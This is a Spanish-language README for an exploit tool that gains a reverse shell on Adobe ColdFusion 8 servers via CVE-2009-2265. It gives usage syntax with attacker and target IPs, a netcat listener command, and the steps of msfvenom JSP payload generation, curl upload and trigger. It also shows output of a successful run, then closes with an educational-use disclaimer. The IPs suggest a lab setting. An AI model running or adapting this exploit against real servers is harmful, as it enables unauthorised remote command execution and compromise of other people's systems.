
Adobe ColdFusion 8 - Ejecución Remota de Comandos (RCE)
Este exploit apunta a una vulnerabilidad conocida en Adobe ColdFusion 8 (CVE-2009-2265). Permite la ejecución remota de comandos (RCE) mediante la subida de un payload JSP malicioso que establece una conexión de shell inversa.
msfvenom.Para usar este exploit, necesitas lo siguiente:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>: IP local del atacante (ej., 10.10.16.5).-p <LPORT>: Puerto local del atacante para la shell inversa (ej., 9001).-r <RHOST>: IP remota del objetivo (ej., 10.10.10.11).-q <RPORT>: Puerto remoto del objetivo donde se ejecuta ColdFusion (ej., 8500)../CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
Inicia un listener en tu máquina atacante:
nc -lnvp 9001
Ejecuta el exploit con los argumentos apropiados.
Una vez ejecutado, el payload se conectará de vuelta a tu listener.
Generar Payload:
msfvenom para generar un payload JSP malicioso.Subir Payload:
Ejecutar Payload:
Establecer Shell Inversa:
msfvenom para la generación del payload.curl para la subida de archivos y ejecución del payload.nc (Netcat) para escuchar conexiones de shell inversa.[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
Este script es solo con fines educativos. Úsalo en sistemas que poseas o para los que tengas permiso explícito de prueba. El uso no autorizado de este exploit en sistemas que no posees es ilegal y poco ético.
Desarrollado por [0xDTC].